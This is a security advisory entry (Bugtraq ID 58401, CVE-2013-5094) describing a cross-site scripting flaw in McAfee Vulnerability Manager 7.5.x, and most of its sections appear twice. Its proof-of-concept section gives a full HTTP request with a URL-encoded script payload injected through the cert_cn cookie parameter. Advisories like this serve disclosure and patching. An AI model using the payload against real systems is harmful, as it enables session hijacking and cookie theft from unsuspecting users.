McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability
BID:58401
Info
McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability
| Bugtraq ID: | 58401 |
| Class: | Input Validation Error |
| CVE: |
CVE-2013-5094 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 08 2013 12:00AM |
| Updated: | Jan 31 2014 01:43AM |
| Credit: | Asheesh Anaconda |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability
McAfee Vulnerability Manager is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
McAfee Vulnerability Manager 7.5.0 and 7.5.1 are vulnerable; other versions may also be affected.
McAfee Vulnerability Manager is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
McAfee Vulnerability Manager 7.5.0 and 7.5.1 are vulnerable; other versions may also be affected.
Exploit / POC
McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example request is available:
GET /www.example.com/index.exp HTTP/1.1
Cookie: identity=p805oa53c0dab5vpcv1da30me7;
cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E;
remember=remember
Host: 172.28.1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example request is available:
GET /www.example.com/index.exp HTTP/1.1
Cookie: identity=p805oa53c0dab5vpcv1da30me7;
cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E;
remember=remember
Host: 172.28.1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Solution / Fix
McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability
References:
References:
- McAfee Homepage (McAfee)